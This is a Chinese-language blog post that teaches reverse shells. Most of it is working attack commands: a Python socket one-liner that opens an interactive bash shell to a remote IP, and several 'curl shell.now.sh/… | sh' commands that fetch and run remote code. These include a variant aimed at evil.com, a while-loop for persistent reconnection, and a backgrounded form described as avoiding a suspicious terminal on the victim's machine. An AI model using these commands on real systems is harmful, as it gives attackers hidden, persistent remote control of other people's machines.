此文章为原创连载文章,关注公众号,持续更新。
欢迎投稿及转载,标明来源作者即可。
原理:
又到了小生归一 的笔记分享~有人期待嘛~
反弹shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。
反弹shell通常被用于因防火墙、权限不足、端口占用等情况下。
1.目标主机在内网,无法直接连接
2.目标主机IP动态改变
3.由于防火墙等的限制,只能目标主机发送请求,不能接收请求
4.目标是获取目标主机的shell
我们常用socket模块进行反弹shell.
常用姿势:
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.3.251",8080));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
在网上我们也可以找到反弹shell姿势,所以我就不在多写了。
有的SSTI中的姿势也可以借鉴过来.
工具
1.姿势查找
这是p神在星球分享的工具,有各种环境的姿势,非常全面。
工具地址:https://krober.biz/misc/reverse_shell.php?ip=3.11.178.242&port=443
2.reverse-shell
(1)监听连接
在您的机器上,打开一个端口并进行监听。您可以使用netcat轻松完成此操作。
nc-l 1337
(2)在目标上执行反向Shell
在目标计算机上,将https://shell.now.sh/yourip:port的输出通过管道传递到sh。
curlhttps://shell.now.sh/192.168.0.69:1337 |sh
回到您的机器,您现在应该有一个shell提示。
(3)您可以使用主机名代替IP。
curlhttps://shell.now.sh/localhost:1337 |sh
(4)远程连接
因为这是反向连接,所以它可以穿透防火墙并连接到Internet。您可以在evil.com上的服务器上侦听连接,并从安全网络内部获得反向外壳。
curlhttps://shell.now.sh/evil.com:1337 |sh
(5)持续连接
默认情况下,当外壳退出时,您将失去连接。您可能会通过无效命令意外地执行此操作。您可以通过将其包装在while循环中来轻松创建将尝试重新连接的shell。
whiletrue;docurl https://shell.now.sh/yourip:1337 |sh;done
(6)作为后台进程运行
终端会话需要保持打开状态以保持反向外壳连接。
以下命令将在后台进程中运行反向外壳程序并退出终端,在受害者的计算机上没有打开看起来可疑的终端窗口。
确保在新的终端窗口中运行此命令,否则将丢失现有会话中的任何工作。
sh-c "curlhttps://shell.now.sh/localhost:1337 | sh -i &"&&exit
工具地址:https://github.com/lukechilds/reverse-shell